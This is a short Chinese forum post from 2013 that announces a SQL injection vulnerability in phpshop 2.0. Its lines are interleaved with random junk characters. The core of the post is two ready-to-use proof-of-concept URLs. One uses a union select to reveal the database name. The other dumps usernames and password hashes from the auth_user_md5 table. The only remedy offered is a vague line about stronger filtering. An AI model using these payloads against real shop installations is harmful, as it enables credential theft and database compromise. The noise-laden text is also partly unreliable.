标题 : phpshop 2.0 SQL Injection Vulnerability7 }* |. l* |% c5 U/ J/ L% q5 Y
* B' Z: n2 s! E6 P* Q. k作者 : By onestree/ I$ n& F- Y' x7 i1 ^
下载地址 : http://code.google.com/p/phpshop/downloads/list
3 |; R' }4 ?! l测试地址: windows 7 / ubuntu, G7 ^6 l8 b% h! q
; v1 E& A8 B& K( _0 q0 B6 U
, O" t* F$ ~0 C# ~SQLi p0c:. a i/ E+ {: N, q1 \
$ X0 V* J9 z/ L8 Q6 J==================
/ n# c5 v. s+ I0 i: x
% U- U' w' w4 I0 V; fhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
- O. j3 F& x, M9 munion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --8 ^4 R z3 L8 }( J; T6 ]
& ^/ ]3 F( Q9 W
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
# {# q7 b1 Z. M: a9 y
! R: t) C0 o/ k/ k6 m修复:
q" I3 M6 e7 H$ m [5 @* g8 ~( F加强过滤4 j; {% t, L# H& z& t
% i8 ]+ B5 a. ]4 c! [5 x
9 S/ Z# V, B! U: Q, a2 e, s7 U |
发表于 2013-1-18 18:24:10
收藏
支持
反对